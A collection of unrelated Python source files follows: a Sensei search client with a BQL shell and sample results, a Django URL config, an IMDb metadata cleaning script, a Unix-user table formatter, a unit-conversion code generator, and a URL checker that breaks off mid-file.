  def get_facet_infos(self):
    return self.facet_infos
  def set_facet_infos(self, facet_infos):
    self.facet_infos = facet_infos
  def get_version(self):
    return self.version
  def set_version(self, version):
    self.version = version
  def get_cluster_info(self):
    return self.cluster_info
  def set_cluster_info(self, cluster_info):
    self.cluster_info = cluster_info
class SenseiRequest:
  """A Sensei search request, optionally built by parsing a BQL statement.

  When *sql_stmt* is given, the statement is parsed (BQLRequest) and its
  pieces (query, paging, sorts, selections, facets, group-by) populate the
  request; otherwise the request starts from defaults and callers fill the
  fields directly."""
  def __init__(self,
               sql_stmt=None,
               offset=DEFAULT_REQUEST_OFFSET,
               count=DEFAULT_REQUEST_COUNT,
               max_per_group=DEFAULT_REQUEST_MAX_PER_GROUP):
    self.qParam = {}
    self.explain = False
    self.route_param = None
    self.sql_stmt = sql_stmt
    self.prepare_time = 0 # Statement prepare time in milliseconds
    self.stmt_type = "unknown"
    if sql_stmt != None:
      # BQL path: parse the statement and time how long preparation takes.
      time1 = datetime.datetime.now()
      bql_req = BQLRequest(sql_stmt)
      ok, msg = bql_req.merge_selections()
      if not ok:
        raise SenseiClientError(msg)
      self.stmt_type = bql_req.get_stmt_type()
      if self.stmt_type == "desc":
        # DESC statements only need the index name.
        self.index = bql_req.get_index()
      else:
        self.query = bql_req.get_query()
        self.offset = bql_req.get_offset() or offset
        self.count = bql_req.get_count() or count
        self.columns = bql_req.get_columns()
        self.sorts = bql_req.get_sorts()
        self.selections = bql_req.get_selections()
        self.facets = bql_req.get_facets()
        # PARAM_RESULT_HIT_STORED_FIELDS is a reserved column name. If this
        # column is selected, turn on fetch_stored flag automatically.
        if (PARAM_RESULT_HIT_STORED_FIELDS in self.columns or
            bql_req.get_fetching_stored()):
          self.fetch_stored = True
        else:
          self.fetch_stored = False
        self.groupby = bql_req.get_groupby()
        self.max_per_group = bql_req.get_max_per_group() or max_per_group
        self.facet_init_param_map = bql_req.get_facet_init_param_map()
      delta = datetime.datetime.now() - time1
      self.prepare_time = delta.seconds * 1000 + delta.microseconds / 1000
      logger.debug("Prepare time: %sms" % self.prepare_time)
    else:
      # Programmatic path: sensible defaults, callers set fields themselves.
      self.query = None
      self.offset = offset
      self.count = count
      self.columns = []
      self.sorts = None
      self.selections = {}
      self.facets = {}
      self.fetch_stored = False
      self.groupby = None
      self.max_per_group = max_per_group
      self.facet_init_param_map = {}
  def get_columns(self):
    """Columns selected by the parsed BQL statement ([] by default)."""
    return self.columns
# XXX Do we really need this class?
class SenseiHit:
  """One search hit: docid, uid, score, explanation, stored fields and
  (optionally) the decoded source data."""

  def __init__(self):
    self.docid = None
    self.uid = None
    self.srcData = {}
    self.score = None
    self.explanation = None
    self.stored = None

  def load(self, jsonHit):
    """Populate this hit from one decoded JSON hit object."""
    self.docid = jsonHit.get(PARAM_RESULT_HIT_DOCID)
    self.uid = jsonHit.get(PARAM_RESULT_HIT_UID)
    self.score = jsonHit.get(PARAM_RESULT_HIT_SCORE)
    self.explanation = jsonHit.get(PARAM_RESULT_HIT_EXPLANATION)
    self.stored = jsonHit.get(PARAM_RESULT_HIT_STORED_FIELDS)
    raw = jsonHit.get(PARAM_RESULT_HIT_SRC_DATA)
    # A missing/empty source string yields None (not the {} set in __init__).
    self.srcData = json.loads(raw) if raw else None
class SenseiResultFacet:
  """One facet value in a result: the value, its hit count, and whether it
  was part of the user's selection."""
  value = None
  count = None
  selected = None
  def load(self,json):
    # NOTE: the parameter name shadows the stdlib ``json`` module; here it
    # is the decoded facet dict from the server response.
    self.value=json.get(PARAM_RESULT_FACET_INFO_VALUE)
    self.count=json.get(PARAM_RESULT_FACET_INFO_COUNT)
    self.selected=json.get(PARAM_RESULT_FACET_INFO_SELECTED,False)
class SenseiResult:
  """Sensei search results for a query."""
  def __init__(self, json_data):
    logger.debug("json_data = %s" % json_data)
    self.jsonMap = json_data
    self.parsedQuery = json_data.get(PARAM_RESULT_PARSEDQUERY)
    self.totalDocs = json_data.get(PARAM_RESULT_TOTALDOCS, 0)
    self.time = json_data.get(PARAM_RESULT_TIME, 0)
    # total_time (client round-trip, ms) is filled in later by doQuery().
    self.total_time = 0
    self.numHits = json_data.get(PARAM_RESULT_NUMHITS, 0)
    self.hits = json_data.get(PARAM_RESULT_HITS)
    map = json_data.get(PARAM_RESULT_FACETS)
    self.facetMap = {}
    if map:
      # Decode each facet list into SenseiResultFacet objects.
      for k, v in map.items():
        facetList = []
        for facet in v:
          facetObj = SenseiResultFacet()
          facetObj.load(facet)
          facetList.append(facetObj)
        self.facetMap[k]=facetList
  def display(self, columns=['*'], max_col_width=40):
    """Print the results in SQL SELECT result format.

    columns: list of column names, or ['*'] to show every hit field
    except group metadata and stored source data.
    max_col_width: hard cap on a rendered column's width; longer values
    are truncated."""
    keys = []
    max_lens = None
    has_group_hits = False
    def get_max_lens(columns):
      # Widest rendered value per column (capped at max_col_width), and
      # whether any hit carries grouped sub-hits.
      max_lens = {}
      has_group_hits = False
      for col in columns:
        max_lens[col] = len(col)
      for hit in self.hits:
        group_hits = [hit]
        if hit.has_key(GROUP_HITS):
          group_hits = hit.get(GROUP_HITS)
          has_group_hits = True
        for group_hit in group_hits:
          for col in columns:
            if group_hit.has_key(col):
              v = group_hit.get(col)
            else:
              v = '<Not Found>'
            if isinstance(v, list):
              v = ','.join([safe_str(item) for item in v])
            elif isinstance(v, (int, long, float)):
              v = str(v)
            value_len = len(v)
            if value_len > max_lens[col]:
              max_lens[col] = min(value_len, max_col_width)
      return max_lens, has_group_hits
    def print_line(char='-', sep_char='+'):
      # One horizontal border row sized from max_lens.
      sys.stdout.write(sep_char)
      for key in keys:
        sys.stdout.write(char * (max_lens[key] + 2) + sep_char)
      sys.stdout.write('\n')
    def print_header():
      # Grouped results use '=' borders, plain results use '-'.
      if has_group_hits:
        print_line('=', '=')
      else:
        print_line('-', '+')
      sys.stdout.write('|')
      for key in keys:
        sys.stdout.write(' %s%s |' % (key, ' ' * (max_lens[key] - len(key))))
      sys.stdout.write('\n')
      if has_group_hits:
        print_line('=', '=')
      else:
        print_line('-', '+')
    def print_footer():
      if has_group_hits:
        print_line('=', '=')
      else:
        print_line('-', '+')
      sys.stdout.write('%s %s%s in set, %s hit%s, %s total doc%s (server: %sms, total: %sms)\n' %
                       (len(self.hits),
                        has_group_hits and 'group' or 'row',
                        len(self.hits) > 1 and 's' or '',
                        self.numHits,
                        self.numHits > 1 and 's' or '',
                        self.totalDocs,
                        self.totalDocs > 1 and 's' or '',
                        self.time,
                        self.total_time
                        ))
    if not self.hits:
      print "No hit is found."
      return
    elif not columns:
      print "No column is selected."
      return
    if len(columns) == 1 and columns[0] == '*':
      # SELECT *: take the first hit's fields, minus group/source metadata.
      keys = self.hits[0].keys()
      if GROUP_HITS in keys:
        keys.remove(GROUP_HITS)
      if GROUP_VALUE in keys:
        keys.remove(GROUP_VALUE)
      if PARAM_RESULT_HIT_SRC_DATA in keys:
        keys.remove(PARAM_RESULT_HIT_SRC_DATA)
    else:
      keys = columns
    max_lens, has_group_hits = get_max_lens(keys)
    print_header()
    # Print the results
    for hit in self.hits:
      group_hits = [hit]
      if hit.has_key(GROUP_HITS):
        group_hits = hit.get(GROUP_HITS)
      for group_hit in group_hits:
        sys.stdout.write('|')
        for key in keys:
          if group_hit.has_key(key):
            v = group_hit.get(key)
          else:
            v = '<Not Found>'
          if isinstance(v, list):
            v = ','.join([safe_str(item) for item in v])
          elif isinstance(v, (int, float, long)):
            v = str(v)
          else:
            # The value may contain unicode characters
            v = safe_str(v)
          if len(v) > max_col_width:
            v = v[:max_col_width]
          sys.stdout.write(' %s%s |' % (v, ' ' * (max_lens[key] - len(v))))
        sys.stdout.write('\n')
      if has_group_hits:
        print_line()
    # Print the result footer
    print_footer()
    # Print facet information
    for facet, values in self.jsonMap.get(PARAM_RESULT_FACETS).iteritems():
      max_val_len = len(facet)
      max_count_len = 1
      for val in values:
        max_val_len = max(max_val_len, min(max_col_width, len(val.get('value'))))
        max_count_len = max(max_count_len, len(str(val.get('count'))))
      total_len = max_val_len + 2 + max_count_len + 3
      sys.stdout.write('+' + '-' * total_len + '+\n')
      sys.stdout.write('| ' + facet + ' ' * (total_len - len(facet) - 1) + '|\n')
      sys.stdout.write('+' + '-' * total_len + '+\n')
      for val in values:
        sys.stdout.write('| %s%s (%s)%s |\n' %
                         (val.get('value'),
                          ' ' * (max_val_len - len(val.get('value'))),
                          val.get('count'),
                          ' ' * (max_count_len - len(str(val.get('count'))))))
      sys.stdout.write('+' + '-' * total_len + '+\n')
class SenseiClient:
  """Sensei client class."""
  def __init__(self,host='localhost',port=8080,path='sensei'):
    self.host = host
    self.port = port
    self.path = path
    self.url = 'http://%s:%d/%s' % (self.host,self.port,self.path)
    self.opener = urllib2.build_opener()
    self.opener.addheaders = [('User-agent', 'Python-urllib/2.5')]
    # NOTE(review): this second assignment replaces (does not extend) the
    # User-agent set on the previous line.
    self.opener.addheaders = [('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30')]
  @staticmethod
  def buildUrlString(req):
    """Flatten a SenseiRequest into the URL-encoded parameter string the
    Sensei REST API expects (paging, query, sorts, selections, facets,
    runtime facet-init params, group-by)."""
    paramMap = {}
    paramMap[PARAM_OFFSET] = req.offset
    paramMap[PARAM_COUNT] = req.count
    if req.query:
      paramMap[PARAM_QUERY]=req.query
    if req.explain:
      paramMap[PARAM_SHOW_EXPLAIN] = "true"
    if req.fetch_stored:
      paramMap[PARAM_FETCH_STORED] = "true"
    if req.route_param:
      paramMap[PARAM_ROUTE_PARAM] = req.route_param
    # paramMap["offset"] = req.offset
    # paramMap["count"] = req.count
    if req.sorts:
      paramMap[PARAM_SORT] = ",".join(sort.buildSortField() for sort in req.sorts)
    # A "query" entry in qParam overrides the plain query and is consumed
    # here; the remaining qParam entries become PARAM_QUERY_PARAM pairs.
    if req.qParam.get("query"):
      paramMap[PARAM_QUERY] = req.qParam.get("query")
      del req.qParam["query"]
    if req.qParam:
      paramMap[PARAM_QUERY_PARAM] = ",".join(param + ":" + req.qParam.get(param)
                                             for param in req.qParam.keys() if param != "query")
    for selection in req.selections.values():
      paramMap[selection.getSelectNotParam()] = selection.getSelectNotParamValues()
      paramMap[selection.getSelectOpParam()] = selection.operation
      paramMap[selection.getSelectValParam()] = selection.getSelectValParamValues()
      if selection.properties:
        paramMap[selection.getSelectPropParam()] = selection.getSelectPropParamValues()
    for facet_name, facet_spec in req.facets.iteritems():
      paramMap["%s.%s.%s" % (PARAM_FACET, facet_name, PARAM_FACET_MAX)] = facet_spec.maxCounts
      paramMap["%s.%s.%s" % (PARAM_FACET, facet_name, PARAM_FACET_ORDER)] = facet_spec.orderBy
      paramMap["%s.%s.%s" % (PARAM_FACET, facet_name, PARAM_FACET_EXPAND)] = facet_spec.expand and "true" or "false"
      paramMap["%s.%s.%s" % (PARAM_FACET, facet_name, PARAM_FACET_MINHIT)] = facet_spec.minHits
    # Runtime facet-init parameters: one type entry and one value entry per
    # (facet, param) pair, with values joined by commas.
    for facet_name, initParams in req.facet_init_param_map.iteritems():
      for name, vals in initParams.bool_map.iteritems():
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_BOOL
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name,
                  PARAM_DYNAMIC_VAL)] = ','.join([val and "true" or "false" for val in vals])
      for name, vals in initParams.int_map.iteritems():
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_INT
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name,
                  PARAM_DYNAMIC_VAL)] = ','.join([safe_str(val) for val in vals])
      for name, vals in initParams.long_map.iteritems():
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_LONG
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name,
                  PARAM_DYNAMIC_VAL)] = ','.join([safe_str(val) for val in vals])
      for name, vals in initParams.string_map.iteritems():
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_STRING
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name,
                  PARAM_DYNAMIC_VAL)] = ','.join(vals)
      for name, vals in initParams.byte_map.iteritems():
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_BYTEARRAY
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name,
                  PARAM_DYNAMIC_VAL)] = ','.join([safe_str(val) for val in vals])
      for name, vals in initParams.double_map.iteritems():
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name, PARAM_DYNAMIC_TYPE)] = PARAM_DYNAMIC_TYPE_DOUBLE
        paramMap["%s.%s.%s.%s" %
                 (PARAM_DYNAMIC_INIT, facet_name, name,
                  PARAM_DYNAMIC_VAL)] = ','.join([safe_str(val) for val in vals])
    if req.groupby:
      paramMap[PARAM_GROUP_BY] = req.groupby
    if req.max_per_group > 0:
      paramMap[PARAM_MAX_PER_GROUP] = req.max_per_group
    return urllib.urlencode(paramMap)
  def doQuery(self, req=None):
    """Execute a search query."""
    time1 = datetime.datetime.now()
    paramString = None
    if req:
      paramString = SenseiClient.buildUrlString(req)
    logger.debug(paramString)
    urlReq = urllib2.Request(self.url, paramString)
    res = self.opener.open(urlReq)
    line = res.read()
    jsonObj = json.loads(line)
    res = SenseiResult(jsonObj)
    # Record the full client-side round-trip time in milliseconds.
    delta = datetime.datetime.now() - time1
    res.total_time = delta.seconds * 1000 + delta.microseconds / 1000
    return res
  def getSystemInfo(self):
    """Get Sensei system info."""
    urlReq = urllib2.Request(self.url + "/sysinfo")
    res = self.opener.open(urlReq)
    line = res.read()
    jsonObj = json.loads(line)
    res = SenseiSystemInfo(jsonObj)
    return res
def main(argv):
  """Interactive Sensei shell: read BQL statements from stdin and run them
  against a Sensei server (host/port from argv, default localhost:8080)."""
  print "Welcome to Sensei Shell"
  from optparse import OptionParser
  usage = "usage: %prog [options]"
  parser = OptionParser(usage=usage)
  parser.add_option("-w", "--column-width", dest="max_col_width",
                    default=100, help="Set the max column width")
  parser.add_option("-v", "--verbose", action="store_true", dest="verbose",
                    default=False, help="Turn on verbose mode")
  (options, args) = parser.parse_args()
  if options.verbose:
    logger.setLevel(logging.DEBUG)
  else:
    logger.setLevel(logging.INFO)
  formatter = logging.Formatter("%(asctime)s %(filename)s:%(lineno)d - %(message)s")
  stream_handler = logging.StreamHandler()
  stream_handler.setFormatter(formatter)
  logger.addHandler(stream_handler)
  if len(args) <= 1:
    client = SenseiClient()
    # NOTE(review): "localhsot" typo in the message below (display only).
    print "using default host=localhsot, port=8080"
  else:
    host = args[0]
    port = int(args[1])
    logger.debug("Url specified, host: %s, port: %d" % (host,port))
    print "Url specified, host: %s, port: %d" % (host,port)
    client = SenseiClient(host, port, 'sensei')
  import readline
  readline.parse_and_bind("tab: complete")
  # REPL: one statement per line until "exit" or EOF.
  while 1:
    try:
      stmt = raw_input('> ')
      if stmt == "exit":
        break
      if options.verbose:
        test(stmt)
      req = SenseiRequest(stmt)
      if req.stmt_type == "select":
        res = client.doQuery(req)
        res.display(columns=req.get_columns(), max_col_width=int(options.max_col_width))
      elif req.stmt_type == "desc":
        sysinfo = client.getSystemInfo()
        sysinfo.display()
      else:
        pass
    except EOFError:
      break
    except ParseException as err:
      # Point a caret at the offending position, then show the message.
      print " " * (err.loc + 2) + "^\n" + err.msg
    except SenseiClientError as err:
      print err
# Script entry point: start the interactive Sensei shell.
if __name__ == "__main__":
  main(sys.argv)
"""
Testing Data:
select color, year, tags, price from cars where query is "cool" and color in ("gold", "green", "blue") except ("black", "blue", "yellow", "white", "red", "silver") and year in ("[1996 TO 1997]", "[2002 TO 2003]") order by price desc limit 0,10
+-------+----------------------+----------------------------------+-------------------------+
| color | year | tags | price |
+-------+----------------------+----------------------------------+-------------------------+
| gold | 00000000000000001997 | cool,moon-roof,reliable,towing | 00000000000000015000.00 |
| green | 00000000000000001996 | cool,favorite,reliable,towing | 00000000000000015000.00 |
| green | 00000000000000001996 | cool,favorite,reliable,towing | 00000000000000014800.00 |
| green | 00000000000000001996 | cool,moon-roof,reliable,towing | 00000000000000014800.00 |
| green | 00000000000000002002 | automatic,cool,reliable,towing | 00000000000000014800.00 |
| gold | 00000000000000002002 | cool,favorite,navigation,towing | 00000000000000014700.00 |
| gold | 00000000000000001996 | cool,favorite,reliable,towing | 00000000000000014700.00 |
| gold | 00000000000000001997 | cool,favorite,reliable,towing | 00000000000000014700.00 |
| gold | 00000000000000001996 | cool,electric,moon-roof,reliable | 00000000000000014400.00 |
| gold | 00000000000000001997 | cool,favorite,hybrid,reliable | 00000000000000014200.00 |
+-------+----------------------+----------------------------------+-------------------------+
10 rows in set, 325 hits, 15001 total docs
select color, year, tags, price from cars where query is "cool" and tags contains all ("cool", "hybrid") except("favorite") and color in ("red", "yellow") order by price desc limit 0,5
+--------+----------------------+----------------------------------+-------------------------+
| color | year | tags | price |
+--------+----------------------+----------------------------------+-------------------------+
| yellow | 00000000000000001995 | cool,hybrid,moon-roof,reliable | 00000000000000014500.00 |
| red | 00000000000000002000 | cool,hybrid,moon-roof,navigation | 00000000000000014500.00 |
| red | 00000000000000001993 | cool,hybrid,moon-roof,navigation | 00000000000000014400.00 |
| red | 00000000000000002002 | automatic,cool,hybrid,navigation | 00000000000000014200.00 |
| yellow | 00000000000000001999 | automatic,cool,hybrid,reliable | 00000000000000012200.00 |
+--------+----------------------+----------------------------------+-------------------------+
5 rows in set, 132 hits, 15001 total docs
select color, year, tags, price from cars where query is "cool" and tags contains all ("cool", "hybrid") except ("favorite") and color in ("red") with ("aaa":"111", "bbb":"222") order by price desc limit 0,10 browse by color(true, 1, 10, hits), year(true, 1, 10, value), price(true, 1, 10, value)
+-------+----------------------+----------------------------------+-------------------------+
| color | year | tags | price |
+-------+----------------------+----------------------------------+-------------------------+
| red | 00000000000000002000 | cool,hybrid,moon-roof,navigation | 00000000000000014500.00 |
| red | 00000000000000001993 | cool,hybrid,moon-roof,navigation | 00000000000000014400.00 |
| red | 00000000000000002002 | automatic,cool,hybrid,navigation | 00000000000000014200.00 |
| red | 00000000000000001998 | automatic,cool,hybrid,navigation | 00000000000000012100.00 |
| red | 00000000000000002002 | automatic,cool,hybrid,reliable | 00000000000000011500.00 |
| red | 00000000000000002002 | automatic,cool,hybrid,reliable | 00000000000000011400.00 |
| red | 00000000000000001998 | automatic,cool,hybrid,reliable | 00000000000000011400.00 |
| red | 00000000000000001996 | automatic,cool,hybrid,reliable | 00000000000000011200.00 |
| red | 00000000000000001999 | automatic,cool,hybrid,reliable | 00000000000000011100.00 |
| red | 00000000000000002001 | cool,hybrid,moon-roof,reliable | 00000000000000010500.00 |
+-------+----------------------+----------------------------------+-------------------------+
10 rows in set, 59 hits, 15001 total docs
+-------------+
| color |
+-------------+
| white (73) |
| yellow (73) |
| blue (62) |
| silver (61) |
| red (59) |
| green (58) |
| gold (53) |
| black (52) |
+-------------+
+-----------------------+
| price |
+-----------------------+
| [* TO 6700] (21) |
| [10000 TO 13100] (8) |
| [13200 TO 17300] (3) |
| [6800 TO 9900] (27) |
+-----------------------+
+---------------------+
| year |
+---------------------+
| [1993 TO 1994] (16) |
| [1995 TO 1996] (13) |
| [1997 TO 1998] (10) |
| [1999 TO 2000] (9) |
| [2001 TO 2002] (11) |
+---------------------+
select color, grouphitscount from cars group by color top 1 limit 0,16000
+--------+----------------+
| color | grouphitscount |
+--------+----------------+
| white | 2196 |
| yellow | 2105 |
| red | 2160 |
| black | 3141 |
| green | 1085 |
| gold | 1110 |
| blue | 1104 |
| silver | 2100 |
+--------+----------------+
8 rows in set, 15001 hits, 15001 total docs
Note: (= (+ 2196 2105 2160 3141 1085 1110 1104 2100) 15001)
select uid, color, makemodel from cars group by color top 3 limit 0,4
=========================================
| uid | color | makemodel |
=========================================
| 1 | white | asian/acura/1.6el |
| 2 | white | asian/acura/1.6el |
| 3 | white | asian/acura/1.6el |
+-----+--------+------------------------+
| 0 | yellow | asian/acura/1.6el |
| 244 | yellow | european/bentley/azure |
| 245 | yellow | european/bentley/azure |
+-----+--------+------------------------+
| 242 | red | european/bentley/azure |
| 246 | red | european/bentley/azure |
| 247 | red | european/bentley/azure |
+-----+--------+------------------------+
| 241 | black | european/bentley/azure |
| 243 | black | european/bentley/azure |
| 10 | black | asian/acura/3.2tl |
+-----+--------+------------------------+
=========================================
4 groups in set, 15001 hits, 15001 total docs
// Signal search example
select tags, publicShareFlag, userid, country, updateType from signal where country in ("us") and My-Network in ("1", "2") given facet param (My-Network, "srcid", int, "8233570")
"""
|
# Copyright (c) Meta Platforms, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from habitat_sim._ext.habitat_sim_bindings import (
Mp3dObjectCategory,
Mp3dRegionCategory,
SceneGraph,
SceneNode,
SceneNodeType,
SemanticCategory,
SemanticLevel,
SemanticObject,
SemanticRegion,
SemanticScene,
)
__all__ = [
"Mp3dObjectCategory",
"Mp3dRegionCategory",
"SceneGraph",
"SceneNode",
"SceneNodeType",
"SemanticCategory",
"SemanticLevel",
"SemanticObject",
"SemanticRegion",
"SemanticScene",
]
|
from django.contrib import admin
from django.urls import path, include
from markdownblog.urls import router as blog_router
# URL routing table: Django admin, the blog's REST API router, and the
# markdownx editor/asset endpoints.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('api/',include(blog_router.urls)),
    path('markdownx/', include('markdownx.urls')),
]
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from collections import Counter
import csv
import sys
# Load the raw IMDb metadata dump.
df = pd.read_csv('movie_metadata.csv')

# Engagement/metadata columns that are not needed downstream.
_DROP_COLUMNS = [
    "color", "num_critic_for_reviews", "actor_3_facebook_likes",
    "actor_1_facebook_likes", "num_voted_users", "facenumber_in_poster",
    "num_user_for_reviews", "actor_2_facebook_likes", "aspect_ratio",
    "director_facebook_likes", "movie_imdb_link", "cast_total_facebook_likes",
    "movie_facebook_likes", "content_rating",
]
df_edited = df.drop(_DROP_COLUMNS, axis=1)

# Rename the surviving columns to human-friendly names.
_RENAMES = {
    "director_name": "Director",
    "duration": "Duration",
    "actor_2_name": "Supporting_Actor_1",
    "genres": "Genres",
    "actor_1_name": "Lead_Actor",
    "movie_title": "Title",
    "actor_3_name": "Supporting_Actor_2",
    "plot_keywords": "Keywords",
    "language": "Language",
    "country": "Country",
    "title_year": "Year_of_Release",
    "imdb_score": "IMDb_Rating",
    "gross": "Revenue",
    "budget": "Budget",
}
df_edited.rename(columns=_RENAMES, inplace=True)

# Titles in this dump carry a trailing junk character; strip it.
df_edited['Title'] = df_edited['Title'].astype(str).str[:-1]

# Fix the column order for the exported dataset.
_COLUMN_ORDER = [
    "Title", "Director", "Year_of_Release", "Genres", "Budget", "Revenue",
    "Duration", "Language", "Country", "Lead_Actor", "Supporting_Actor_1",
    "Supporting_Actor_2", "IMDb_Rating", "Keywords",
]
df_edited = df_edited[_COLUMN_ORDER]
def stringToList(string):
    """Split a pipe-delimited string into a list of its segments.

    ``str.split`` already returns a list, so the original's extra
    ``list(...)`` wrapper was redundant and has been dropped.
    """
    return string.split("|")
def editColumns(df):
    """Convert the 'Genres' and 'Keywords' columns from pipe-delimited
    strings into Python lists, in place.

    The original iterated the whole frame twice (one ``iterrows`` pass per
    column); a single pass performs both conversions.  Keywords are passed
    through ``str`` first because missing values arrive as NaN floats.
    """
    for index_label, row_series in df.iterrows():
        df.at[index_label, 'Genres'] = stringToList(row_series['Genres'])
        df.at[index_label, 'Keywords'] = stringToList(str(row_series['Keywords']))
# Apply the list conversions and write the cleaned dataset to disk.
editColumns(df_edited)
df_edited.to_csv("edited_movie_database.csv", index=False, encoding='utf8')
|
from typing import (
Tuple,
)
from terminaltables import AsciiTable
from user import UnixUser
def _fmt_members(members: Tuple[str]):
return ",".join(members)
def _fmt_users(users: Tuple[UnixUser]):
    """Build one table row (list of cell values) per user."""
    rows = []
    for user in users:
        rows.append([
            user.name,
            user.uid,
            user.group.name,
            user.gecos or "",
            user.home_dir,
            user.shell,
            _fmt_members(user.group_membership),
        ])
    return rows
class UsersAsciiTable:
    """Render a collection of UnixUser records as an ASCII table."""
    def __init__(self, users: Tuple[UnixUser]):
        # Pre-format the rows once; __str__ only assembles the table.
        self._users = _fmt_users(users)
    def __str__(self):
        # Header row first, then one row per user.
        HEADER = ("User name", "Id", "Group", "Gecos", "Home dir", "Shell", "Group membership")
        data = [HEADER]
        data.extend(self._users)
        ascii_table = AsciiTable(data)
        return ascii_table.table
|
# -*- coding: utf-8 -*-
import os
import numpy as np
from .Template import wrap, Specifications, Template, expr_dir
def generate_unitconversions(args=None):
    """Generate the Units.h unit-conversion tables from unitconversions.yml.

    For every category in the spec, collects the base unit, optional
    prefixed variants, and explicit conversions, then writes the sorted
    name/abbreviation/type/conversion arrays into the Units.h template.
    Returns locals() for debugging/inspection.
    """
    with Specifications("unitconversions.yml") as specs:
        unitconversions = specs["unitconversions"]
    units = []
    abbrs = []
    unitTypes = []
    conversions = []
    with Template(
        "Units.h", os.path.join(expr_dir, "UnitConversionExpression", "Units.h"),
    ) as template:
        for category, specs in unitconversions["categories"].items():
            base = specs["base"]
            abbr = specs["baseabbr"]
            baseconversion = float(specs.get("baseconversion", 1))
            # Multiplier appended to GSL constants when the base is rescaled.
            bc = f"*{1/baseconversion}" if baseconversion != 1 else ""
            # The base unit itself always converts with factor 1.
            units.append(base)
            abbrs.append(abbr)
            unitTypes.append(category)
            conversions.append(1)
            prefixes = specs.get("prefixes", {})
            if "baseprefixes" in specs:
                prefixes.update(unitconversions["prefixes"])
            baseconversion = specs.get("baseconversion", 1)
            # Prefixed variants (e.g. kilo-, milli-) of the base unit.
            units.extend((f"{prefix}{base}" for prefix in prefixes.keys()))
            abbrs.extend((f"{prefix}{abbr}" for prefix in prefixes.values()))
            unitTypes.extend((category for p in prefixes))
            conversions.extend(
                (
                    specs.get("custom", {}).get(
                        prefix, f"GSL_CONST_NUM_{prefix.upper()}"
                    )
                    for prefix in prefixes.keys()
                )
            )
            # Explicit non-prefix conversions for this category.
            units.extend(specs.get("conversions", {}).keys())
            abbrs.extend(specs.get("conversions", {}).values())
            unitTypes.extend((category for c in specs.get("conversions", {})))
            conversions.extend(
                (
                    specs.get("custom", {}).get(
                        conv, f"GSL_CONST_MKSA_{conv.upper()}{bc}"
                    )
                    for conv in specs.get("conversions", {}).keys()
                )
            )
        # Abbreviations must be globally unique; report duplicates.
        unq, unq_idx, unq_cnt = np.unique(
            abbrs, return_inverse=True, return_counts=True
        )
        assert np.all(unq_cnt == 1), np.array(abbrs)[unq_cnt != 1]
        assert len(units) == len(abbrs)
        assert len(units) == len(unitTypes)
        assert len(units) == len(conversions)
        categories = list(unitconversions["categories"].keys())
        # Sort all parallel arrays by abbreviation, then index names by unit.
        unitconversions = list(zip(units, abbrs, unitTypes, conversions))
        unitconversions.sort(key=lambda k: k[1])
        units, abbrs, unitTypes, conversions = zip(*unitconversions)
        units = sorted(enumerate(units), key=lambda k: k[1])
        template.replace(
            UnitTypes=",\n\t".join((c.upper() for c in categories)),
            numUnits=len(units),
            unitNames=wrap((f'"{unit}"' for index, unit in units)),
            unitIndices=wrap((str(index) for index, unit in units)),
            unitAbbreviations=wrap((f'"{abbr}"' for abbr in abbrs)),
            unitTypes=wrap((t.upper() for t in unitTypes)),
            unitConversions=wrap(map(str, conversions)),
        )
    return locals()
# Script entry point: regenerate the Units.h tables.
if __name__ == "__main__":
    generate_unitconversions()
|
import urllib.request
import re
# Check if the URL is well formed
def check_url_sanity(url):
    """Return True when *url* looks like a well-formed http/https/ftp/ftps URL."""
    pattern = re.compile(
        r'^(?:http|ftp)s?://' # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
        r'localhost|' #localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
        r'(?::\d+)?' # optional port
        r'(?:/?|[/?]\S+)$',
        re.IGNORECASE,
    )
    return pattern.match(url) is not None
# Check if the URL exists
def check_url_validity(url):
    """Return True when *url* can actually be fetched, False otherwise.

    Catches ``URLError`` (the base class of ``HTTPError``) so DNS failures
    and refused connections report False instead of crashing; the original
    only caught HTTP error statuses.  The response is closed via ``with``
    instead of being leaked.
    """
    try:
        with urllib.request.urlopen(url):
            return True
    except urllib.request.URLError:
        return False
# Get the URL from user
def get_url():
    """Prompt the user for a URL and return the raw input string."""
    return input("URL: ")
# Store the URL if it is valid
def store_url(url):
    """Append *url* (newline-terminated) to urls.txt, creating it if needed.

    Uses ``with`` so the file handle is closed even when the write raises;
    the original closed it manually and would leak on failure.
    """
    with open("urls.txt", "a+") as f:
        f.write("{}\n".format(url))
# Fetch stored URLs
def get_urls():
    """Return every stored URL from urls.txt, one list entry per line
    (trailing newlines included)."""
    with open("urls.txt") as f:
        return f.readlines()
def main():
